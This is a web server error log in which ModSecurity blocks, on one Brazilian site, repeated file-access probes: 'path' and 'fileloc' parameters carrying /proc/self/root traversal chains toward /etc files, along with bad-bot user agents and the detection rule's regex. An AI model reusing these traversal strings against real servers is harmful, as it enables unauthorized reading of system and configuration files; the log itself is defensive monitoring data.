https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:34:09.179717 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:51576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpVcdY0UrI5A3LftIxY_QAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:35:03.596714 2026] [:error] [pid 17887:tid 140411632822016] [client 216.73.216.191:44002] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpVpwkwaGbbGflqUZDX_gAAAM0"]
[Wed Mar 18 04:35:10.881598 2026] [:error] [pid 29882:tid 140411565680384] [client 216.73.216.191:44270] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpVrkzinOy1jxa1j4fYlwAAARU"]
[Wed Mar 18 04:35:17.131587 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.241.31:51586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpVtSmAPhZkrhU8w4kzawAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:35:38.071166 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:33452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpVysdf6f5d65gmYZSXDgAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:36:31.795555 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.241.31:40294] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpV_ymAPhZkrhU8w4kzkAAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:36:44.967195 2026] [:error] [pid 26799:tid 140411557287680] [client 216.73.216.191:46382] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpWDNa6ubjKNq_cu4Zc_QAAA1Y"]
[Wed Mar 18 04:36:47.272567 2026] [mime_magic:error] [pid 29882:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:46504] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 04:37:09.829834 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.244.43:33496] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpWJcdf6f5d65gmYZSXLgAAAtc"]
[Wed Mar 18 04:37:13.842170 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.228.61:55572] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpWKdY0UrI5A3LftIxZaAAAAZg"]
[Wed Mar 18 04:37:17.006084 2026] [:error] [pid 11816:tid 140411624429312] [client 216.73.216.191:47144] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpWLew_le52K8_3pV2mjQAAAg4"]
[Wed Mar 18 04:37:57.351099 2026] [:error] [pid 17653:tid 140411658000128] [client 216.73.216.191:48012] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpWVcdf6f5d65gmYZSXRAAAAso"]
[Wed Mar 18 04:38:17.010622 2026] [:error] [pid 29882:tid 140411708356352] [client 216.73.216.191:48628] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpWaUzinOy1jxa1j4fZDwAAAQQ"]
[Wed Mar 18 04:39:17.197339 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.241.31:39702] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpWpdY0UrI5A3LftIxZ1wAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:39:20.660449 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.241.31:39134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpWqOw_le52K8_3pV2mugAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:39:30.838442 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:39136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpWsgkwaGbbGflqUZDYWgAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:39:36.957796 2026] [mime_magic:error] [pid 31803:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:3732] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 04:40:06.895744 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.241.31:57004] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpW1kzinOy1jxa1j4fZRwAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:40:11.719922 2026] [:error] [pid 11816:tid 140411557287680] [client 216.73.216.191:51184] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpW2-w_le52K8_3pV2mzwAAAhY"]
[Wed Mar 18 04:41:15.593333 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.241.31:48936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpXGymAPhZkrhU8w4k0YQAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 04:41:40.174493 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.241.31:43772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpXNOw_le52K8_3pV2nFwAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 04:41:48.211138 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:36496] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpXPOyqAr6etmhZHNqAqQAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:42:07.474060 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:37762] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpXT-oXxyEfFpUF8f8zWQAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:42:12.186312 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.244.43:34122] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpXVPu8EFLIOrSqIpvM-QAAAkg"]
[Wed Mar 18 04:42:14.560473 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.228.61:33380] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpXVta6ubjKNq_cu4ZdcgAAA0Q"]
[Wed Mar 18 04:42:26.499713 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.241.31:44632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpXYkzinOy1jxa1j4fZcwAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:44:02.579767 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:41840] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpXweyqAr6etmhZHNqBGQAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
